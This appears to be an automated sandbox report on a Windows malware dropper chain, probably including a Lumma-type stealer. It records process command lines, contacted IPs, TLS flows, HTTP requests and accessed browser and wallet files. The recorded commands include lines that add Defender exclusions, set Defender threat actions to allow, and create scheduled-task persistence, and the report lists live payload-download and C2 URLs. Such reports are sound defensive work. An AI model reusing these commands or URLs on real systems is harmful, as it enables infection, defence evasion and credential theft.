Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | May 31, 2024, 7:29 a.m. | May 31, 2024, 7:35 a.m. |
-
-
-
33333.exe "C:\Users\test22\AppData\Local\Temp\1000004001\33333.exe"
2820 -
fileosn.exe "C:\Users\test22\AppData\Local\Temp\1000005001\fileosn.exe"
2892 -
lumma1234.exe "C:\Users\test22\AppData\Local\Temp\1000006001\lumma1234.exe"
2964 -
gold.exe "C:\Users\test22\AppData\Local\Temp\1000008001\gold.exe"
3032 -
swizzzz.exe "C:\Users\test22\AppData\Local\Temp\1000009001\swizzzz.exe"
2080 -
-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\1000020001\file300un.exe" -Force
2308 -
-
-
zB5wqyHN0DJjyQ0CADePMad2.exe C:\Users\test22\Documents\SimpleAdobe\zB5wqyHN0DJjyQ0CADePMad2.exe
3036-
RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3228
-
-
-
-
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
3504-
forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
3540 -
forfiles.exe forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
2136 -
forfiles.exe forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
3996 -
forfiles.exe forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
3732 -
forfiles.exe forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
3280-
-
-
gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force
1256
-
-
-
-
-
-
-
-
-
-
-
schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\test22\AppData\Local\Temp\1000031001\Newoff.exe" /F
1952 -
FirstZ.exe "C:\Users\test22\AppData\Local\Temp\1000285001\FirstZ.exe"
2912
-
-
-
-
explorer.exe C:\Windows\Explorer.EXE
1236 -
360TS_Setup.exe "C:\Users\test22\Pictures\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo=
3184-
360TS_Setup.exe "C:\Program Files (x86)\1717128839_0\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo= /TSinstall
3780-
regsvr32.exe "C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\360\Total Security\MenuEx64.dll"
3864-
regsvr32.exe /s "C:\Program Files (x86)\360\Total Security\MenuEx64.dll"
2172
-
-
PowerSaver.exe "C:\Program Files (x86)\360\Total Security\Utils\PowerSaver.exe" /flightsigning
3376 -
QHActiveDefense.exe "C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe" /install
2544
-
-
IP Address | Status | Action |
---|---|---|
18.244.61.37 | Active | Moloch |
104.153.233.177 | Active | Moloch |
104.192.141.1 | Active | Moloch |
104.20.3.235 | Active | Moloch |
104.21.66.124 | Active | Moloch |
104.26.5.15 | Active | Moloch |
104.26.9.59 | Active | Moloch |
121.254.136.9 | Active | Moloch |
147.45.47.149 | Active | Moloch |
13.225.129.190 | Active | Moloch |
147.45.47.70 | Active | Moloch |
164.124.101.2 | Active | Moloch |
172.67.169.89 | Active | Moloch |
172.67.19.24 | Active | Moloch |
172.67.213.39 | Active | Moloch |
185.172.128.159 | Active | Moloch |
185.172.128.19 | Active | Moloch |
185.172.128.69 | Active | Moloch |
185.172.128.82 | Active | Moloch |
185.215.113.67 | Active | Moloch |
18.244.61.49 | Active | Moloch |
18.244.61.7 | Active | Moloch |
18.244.61.79 | Active | Moloch |
18.64.13.203 | Active | Moloch |
194.54.164.123 | Active | Moloch |
23.43.165.153 | Active | Moloch |
23.52.33.11 | Active | Moloch |
34.117.186.192 | Active | Moloch |
45.130.41.108 | Active | Moloch |
5.42.66.10 | Active | Moloch |
5.42.66.47 | Active | Moloch |
51.75.247.100 | Active | Moloch |
54.192.175.109 | Active | Moloch |
54.230.61.34 | Active | Moloch |
54.230.61.39 | Active | Moloch |
54.230.61.65 | Active | Moloch |
54.230.61.95 | Active | Moloch |
54.255.136.181 | Active | Moloch |
54.76.174.118 | Active | Moloch |
54.77.42.29 | Active | Moloch |
37.221.125.202 | Active | Moloch |
51.15.65.182 | Active | Moloch |
51.195.138.197 | Active | Moloch |
64.185.227.155 | Active | Moloch |
77.91.77.33 | Active | Moloch |
82.145.215.156 | Active | Moloch |
85.192.56.26 | Active | Moloch |
87.240.132.78 | Active | Moloch |
91.202.233.232 | Active | Moloch |
94.232.45.38 | Active | Moloch |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLS 1.2 192.168.56.103:49192 172.67.169.89:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 | CN=yip.su | d6:8b:e9:f2:36:d3:41:9a:cd:54:05:25:68:49:59:5d:36:4b:1a:38 |
TLSv1 192.168.56.103:49187 23.43.165.153:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=download.winzip.com | 30:9b:82:ca:d6:ce:c6:fe:83:10:ba:23:41:9a:e9:9b:a3:98:36:9a |
TLS 1.2 192.168.56.103:49191 172.67.19.24:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 | CN=pastebin.com | 51:a9:80:ce:77:62:b2:72:d2:05:30:60:fd:f4:39:60:f3:7d:ac:16 |
TLS 1.2 192.168.56.103:49196 54.192.175.109:443 |
C=CN, O=WoTrus CA Limited, CN=WoTrus DV Server CA [Run by the Issuer] | CN=free.360totalsecurity.com | 4f:76:01:e7:f6:e1:fc:0e:2f:fe:b0:89:6a:bc:1c:cf:63:d4:51:58 |
TLS 1.2 192.168.56.103:49199 104.153.233.177:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=backblazeb2.com | c3:1e:e9:5b:82:2b:2d:13:7d:ed:23:05:c4:07:9a:19:b1:71:bd:d1 |
TLSv1 192.168.56.103:49183 23.43.165.153:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=download.winzip.com | 30:9b:82:ca:d6:ce:c6:fe:83:10:ba:23:41:9a:e9:9b:a3:98:36:9a |
TLSv1 192.168.56.103:49188 23.43.165.153:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=download.winzip.com | 30:9b:82:ca:d6:ce:c6:fe:83:10:ba:23:41:9a:e9:9b:a3:98:36:9a |
TLSv1 192.168.56.103:49241 104.26.9.59:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=myip.com | 81:cd:fe:ad:24:9d:a3:fa:b9:34:be:53:2f:fe:1e:91:2a:ac:03:2a |
TLS 1.3 192.168.56.103:49255 51.195.138.197:10943 |
None | None | None |
TLSv1 192.168.56.103:49254 82.145.215.156:443 |
C=CN, O=WoTrus CA Limited, CN=WoTrus DV Server CA [Run by the Issuer] | CN=static.360totalsecurity.com | 2c:85:a3:e4:0e:fb:0e:8c:f8:04:1a:a9:02:b8:0d:ab:85:5f:b0:b3 |
TLSv1 192.168.56.103:49247 104.26.5.15:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 | CN=db-ip.com | 1f:af:15:cd:f8:f8:ee:30:f9:6e:6e:54:bc:9a:a7:c7:77:70:6d:25 |
TLSv1 192.168.56.103:49287 172.67.213.39:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 | CN=fleur-de-lis.sbs | b1:db:2b:5a:3b:10:70:c9:6e:f7:88:c4:d1:d7:96:7d:37:1f:d7:49 |
TLSv1 192.168.56.103:49291 18.64.13.203:443 |
C=US, O=Amazon, CN=Amazon RSA 2048 M01 | CN=*.cloudfront.net | fa:21:45:dc:4d:94:03:a3:09:77:51:78:4a:21:f2:c5:6d:94:be:52 |
TLSv1 192.168.56.103:49301 45.130.41.108:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=monoblocked.com | 2c:d3:99:84:08:33:38:25:31:da:34:23:da:07:ec:a6:6f:e6:0a:ac |
TLSv1 192.168.56.103:49306 87.240.132.78:443 |
C=BE, O=GlobalSign nv-sa, CN=GlobalSign ECC OV SSL CA 2018 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com | 65:c4:6f:80:24:02:e8:bf:a9:67:89:c3:4c:f8:46:77:d0:3b:df:fd |
TLS 1.3 192.168.56.103:49258 51.15.65.182:14433 |
None | None | None |
TLS 1.3 192.168.56.103:49257 104.20.3.235:443 |
None | None | None |
TLSv1 192.168.56.103:49317 87.240.132.78:443 |
C=BE, O=GlobalSign nv-sa, CN=GlobalSign ECC OV SSL CA 2018 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com | 65:c4:6f:80:24:02:e8:bf:a9:67:89:c3:4c:f8:46:77:d0:3b:df:fd |
TLSv1 192.168.56.103:49326 87.240.132.78:443 |
C=BE, O=GlobalSign nv-sa, CN=GlobalSign ECC OV SSL CA 2018 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com | 65:c4:6f:80:24:02:e8:bf:a9:67:89:c3:4c:f8:46:77:d0:3b:df:fd |
TLSv1 192.168.56.103:49325 87.240.132.78:443 |
C=BE, O=GlobalSign nv-sa, CN=GlobalSign ECC OV SSL CA 2018 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com | 65:c4:6f:80:24:02:e8:bf:a9:67:89:c3:4c:f8:46:77:d0:3b:df:fd |
TLSv1 192.168.56.103:49331 87.240.132.78:443 |
C=BE, O=GlobalSign nv-sa, CN=GlobalSign ECC OV SSL CA 2018 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com | 65:c4:6f:80:24:02:e8:bf:a9:67:89:c3:4c:f8:46:77:d0:3b:df:fd |
TLSv1 192.168.56.103:49335 87.240.132.78:443 |
C=BE, O=GlobalSign nv-sa, CN=GlobalSign ECC OV SSL CA 2018 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com | 65:c4:6f:80:24:02:e8:bf:a9:67:89:c3:4c:f8:46:77:d0:3b:df:fd |
TLSv1 192.168.56.103:49293 104.21.66.124:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 | CN=foxesjoy.com | 98:61:17:75:9f:9b:34:ec:5e:dd:5b:36:49:5e:1b:7d:2d:22:18:22 |
TLSv1 192.168.56.103:49311 87.240.132.78:443 |
C=BE, O=GlobalSign nv-sa, CN=GlobalSign ECC OV SSL CA 2018 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com | 65:c4:6f:80:24:02:e8:bf:a9:67:89:c3:4c:f8:46:77:d0:3b:df:fd |
TLS 1.2 192.168.56.103:49363 104.192.141.1:443 |
C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA | unknown=US, unknown=Delaware, unknown=Private Organization, serialNumber=3928449, C=US, ST=California, L=San Francisco, O=Atlassian US, Inc., CN=bitbucket.org | bf:7c:47:a3:25:75:32:6e:c5:f8:ea:29:e6:bd:ba:2d:a7:99:28:78 |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
file | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe |
file | c:\program files\mozilla firefox\firefox.exe |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome |
section | \x00 |
section | .idata |
section | |
section | epnjyyts |
section | llwtnlzz |
section | .taggant |
suspicious_features | POST method with no referer header, POST method with no useragent header, Connection to IP address | suspicious_request | POST http://147.45.47.70/tr8nomy/index.php | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://147.45.47.70/lend/33333.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://147.45.47.70/lend/fileosn.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://147.45.47.70/lend/lumma1234.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://147.45.47.70/lend/gold.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://147.45.47.70/lend/swizzzz.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://147.45.47.70/lend/file300un.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://147.45.47.70/lend/CoMachina.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://185.172.128.19/Newoff.exe | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header, Connection to IP address | suspicious_request | POST http://185.172.128.19/ghsdh39s/index.php | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://185.172.128.19/FirstZ.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://judgecaption.hair/load/download.php?c=1002 | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://185.172.128.82/server/12/AppGate2103v01.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://5.42.66.47/files/setup.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://5.42.66.47/files/kpow.exe | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://85.192.56.26/api/bing_release.php | ||||||
suspicious_features | POST method with no referer header, Connection to IP address | suspicious_request | POST http://85.192.56.26/api/flash.php | ||||||
suspicious_features | Connection to IP address | suspicious_request | HEAD http://5.42.66.10/download/th/getimage12.php | ||||||
suspicious_features | Connection to IP address | suspicious_request | HEAD http://5.42.66.10/download/123p.exe | ||||||
suspicious_features | Connection to IP address | suspicious_request | HEAD http://77.91.77.33/current.exe | ||||||
suspicious_features | Connection to IP address | suspicious_request | HEAD http://185.172.128.159/dl.php | ||||||
suspicious_features | Connection to IP address | suspicious_request | HEAD http://185.172.128.69/download.php?pub=inte | ||||||
suspicious_features | Connection to IP address | suspicious_request | HEAD http://94.232.45.38/eee01/eee01.exe | ||||||
suspicious_features | Connection to IP address | suspicious_request | HEAD http://91.202.233.232/o2i3jroi23joj23ikrjokij3oroi.exe | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://77.91.77.33/current.exe | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://91.202.233.232/o2i3jroi23joj23ikrjokij3oroi.exe | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://185.172.128.159/dl.php | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://185.172.128.69/download.php?pub=inte | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://5.42.66.10/download/th/getimage12.php | ||||||
suspicious_features | Connection to IP address | suspicious_request | HEAD http://5.42.66.10/download/th/retail.php | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://94.232.45.38/eee01/eee01.exe | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://5.42.66.10/download/123p.exe | ||||||
suspicious_features | Connection to IP address | suspicious_request | HEAD http://5.42.66.10/download/th/space.php | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://5.42.66.10/download/th/space.php | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://5.42.66.10/download/th/retail.php | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://pastebin.com/raw/E0rY26ni | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://yip.su/RNWPd.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://free.360totalsecurity.com/totalsecurity/360TS_Setup_Mini_WW.Marketator.CPI20230405_6.6.0.1054.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://bitbucket.org/qwizzi/tt522222/downloads/GroceryExtensive.exe |
request | POST http://147.45.47.70/tr8nomy/index.php |
request | GET http://147.45.47.70/lend/33333.exe |
request | GET http://147.45.47.70/lend/fileosn.exe |
request | GET http://147.45.47.70/lend/lumma1234.exe |
request | GET http://147.45.47.70/lend/gold.exe |
request | GET http://147.45.47.70/lend/swizzzz.exe |
request | GET http://147.45.47.70/lend/file300un.exe |
request | GET http://147.45.47.70/lend/CoMachina.exe |
request | GET http://185.172.128.19/Newoff.exe |
request | POST http://185.172.128.19/ghsdh39s/index.php |
request | GET http://185.172.128.19/FirstZ.exe |
request | GET http://judgecaption.hair/load/download.php?c=1002 |
request | GET http://x1.i.lencr.org/ |
request | GET http://185.172.128.82/server/12/AppGate2103v01.exe |
request | GET http://5.42.66.47/files/setup.exe |
request | GET http://5.42.66.47/files/kpow.exe |
request | GET http://s.360safe.com/360ts/mini_inst.htm?ver=6.6.0.1054&pid=WW.Marketator.CPI20230405&os=6.1&mid=3b96717f137ac716bab250f817240788&state=153 |
request | GET http://s.360safe.com/safei18n/query_env.htm?v611=DgY0MAEIaE8ANQABAACIxljg%2Bs3AO%2B0eWhzT0CCPWqvYqoW%2FAXsYCkM61lI%2BjOdsVPZofosJfkCESIQRWuogw%2Bxnis1yNTX%2BrFjUu6Agqzr7kjY%2FLdgky7wDkGwc1XBOmQC4lKBxt2mIp6Ntq%2FaVMIjGmvkz3VZAnrlTdRwC6RQbG5%2BLDjWJ1p%2FmKxXWoNNk700GNXR5xGTIwsxCwki4zsrmGoivJ0Qf9A45nkrMHdSG6RZfjTMCiFDkqsBk4iHajyAb4j%2F2JtKI4HfOJwBZ%2FBSRCThuwwfgVUkxwGsXYg37lTWkQgNdiCixMwoCkb770r4G4gQUR0%2FBAdU%2BEJinoJ3yydoquYw3e5hR%2BBmWS4tWrUz0bl9LrJXnrP5CcdiAJ3ITPstRbLsmxqf4VDOts1Z75JuBm6GmmA0kf4X7RZvIf2F8Ir5P0kmgaCKCvEm9ndsRxV5dZ%2F72AxQrWWc%3D |
request | GET http://iup.360safe.com/iv3/pc/360safe/360TS_Setup_For_Mini_Rel.cab |
request | GET http://s.360safe.com/safei18n/dimana.htm?lr=1&mid=3b96717f137ac716bab250f817240788&mod=360Installer.exe&ph=02a8342074eb25c8adb2d135e2bab7e5&p2p=1&t_id=360TS_Setup_For_Mini.cab&tads=656&tdl=656&tds=656&terr=0&tes=Status|1,ErrorCode|0,DnCount|6,HttpNum|1,DnFailCount|6,FStatus|1,P2SS|656,P2PS|0,PDMode|2&tfl=656&tp=t&tst=1&ttdl=656&ttm=1000&ttup=120&vh=1.3.0.1361&vp=1.3.0.1320&softname=360TS |
request | GET http://int.down.360safe.com/totalsecurity/360TS_Setup_11.0.0.1103.exe |
request | GET http://sd.p.360safe.com/AC05282966EF28F0BC58DFBBE2E9591EF2A43BD6.trt |
request | GET http://s.360safe.com/safei18n/dimana.htm?lr=1&mid=3b96717f137ac716bab250f817240788&mod=360Installer.exe&ph=BA320C501D0312BEC018E22653081CCD&p2p=1&t_id=360TS_Setup.exe&tads=14824882&tdl=103774176&tds=14571280&terr=0&tes=Status|1,ErrorCode|0,DnCount|23,HttpNum|18,DnFailCount|22,FStatus|1,P2SS|103774176,P2PS|0,PDMode|3&tfl=103774176&tp=t&tst=1&ttdl=103774176&ttm=7219&ttup=120&vh=1.3.0.1361&vp=1.3.0.1320&softname=360TS |
request | GET http://85.192.56.26/api/bing_release.php |
request | GET http://apps.identrust.com/roots/dstrootcax3.p7c |
request | GET http://s.360safe.com/360ts/mini_inst.htm?ver=6.6.0.1054&pid=WW.Marketator.CPI20230405&os=6.1&mid=3b96717f137ac716bab250f817240788&state=9&dt=7&size=103774176&ds=14824882.29 |
request | POST http://85.192.56.26/api/flash.php |
request | HEAD http://5.42.66.10/download/th/getimage12.php |
request | HEAD http://5.42.66.10/download/123p.exe |
request | HEAD http://77.91.77.33/current.exe |
request | HEAD http://185.172.128.159/dl.php |
request | HEAD http://185.172.128.69/download.php?pub=inte |
request | HEAD http://94.232.45.38/eee01/eee01.exe |
request | HEAD http://91.202.233.232/o2i3jroi23joj23ikrjokij3oroi.exe |
request | GET http://77.91.77.33/current.exe |
request | HEAD http://judgecaption.hair/load/download.php?c=1001 |
request | HEAD http://fleur-de-lis.sbs/jhgfd |
request | GET http://91.202.233.232/o2i3jroi23joj23ikrjokij3oroi.exe |
request | GET http://185.172.128.159/dl.php |
request | GET http://185.172.128.69/download.php?pub=inte |
request | GET http://5.42.66.10/download/th/getimage12.php |
request | HEAD http://5.42.66.10/download/th/retail.php |
request | GET http://94.232.45.38/eee01/eee01.exe |
request | GET http://5.42.66.10/download/123p.exe |
request | GET http://judgecaption.hair/load/download.php?c=1001 |
request | GET http://fleur-de-lis.sbs/jhgfd |
request | HEAD http://5.42.66.10/download/th/space.php |
request | GET http://5.42.66.10/download/th/space.php |
request | GET http://5.42.66.10/download/th/retail.php |
request | GET https://pastebin.com/raw/E0rY26ni |
request | POST http://147.45.47.70/tr8nomy/index.php |
request | POST http://185.172.128.19/ghsdh39s/index.php |
request | POST http://85.192.56.26/api/flash.php |
regkey | .*360Safe |
regkey | .*rising |
regkey | .*Kingsoft |
regkey | .*JiangMin |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieaf |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\lockfile |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ebfidpplhabeedpnhjnobghokpiioolj |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\agoakfejjabomempkjlepdflaleeobhb |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghpilmjholiicaobfjdkefcogmgaabif |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aodkkagnadcbobfpggfnjeongemjbjca |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mfgccjchihfkkindfppnaooecgfneiii |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fmblappgoiilbgafhjklehhfifbdocee |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Opera Software |
registry | HKEY_CURRENT_USER\SOFTWARE\Opera Software |
domain | ipinfo.io |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\fr\deepscan\DsRes.dll |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\QHVer.dll |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\softmgr\SomAdvUtils.dll |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\safemon\360procmon.dll |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\safemon\QHActiveDefense.exe |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\deepscan\rmt.exe |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\HomeRouterMgr.exe |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\scanstub.dll |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\safemon\disproc.dll |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\softmgr\SML\SMLLauncher64.dll |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\sites.dll |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\netmon\netmstart.dll |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\LeakFixHelper64.dll |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\deepscan\BAPI.dll |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\safemon\chromesafe64.dll |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\safemon\libzdtp.dll |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\I18N64.dll |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\es\deepscan\DsRes64.dll |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\QHSafeMain.exe |
file | C:\Users\test22\AppData\Local\Temp\1000285001\FirstZ.exe |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\softmgr\SML\SMLHelper64.exe |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\safemon\360SPTool.exe |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\Safelive.dll |
file | C:\Users\test22\AppData\Local\Temp\1000005001\fileosn.exe |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\softmgr\SomAdvUtilsWrap.dll |
file | C:\Users\test22\AppData\Local\Temp\1000009001\swizzzz.exe |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\360 Security Center\360 Total Security\360 Total Security.lnk |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\safemon\svcMonitor.dll |
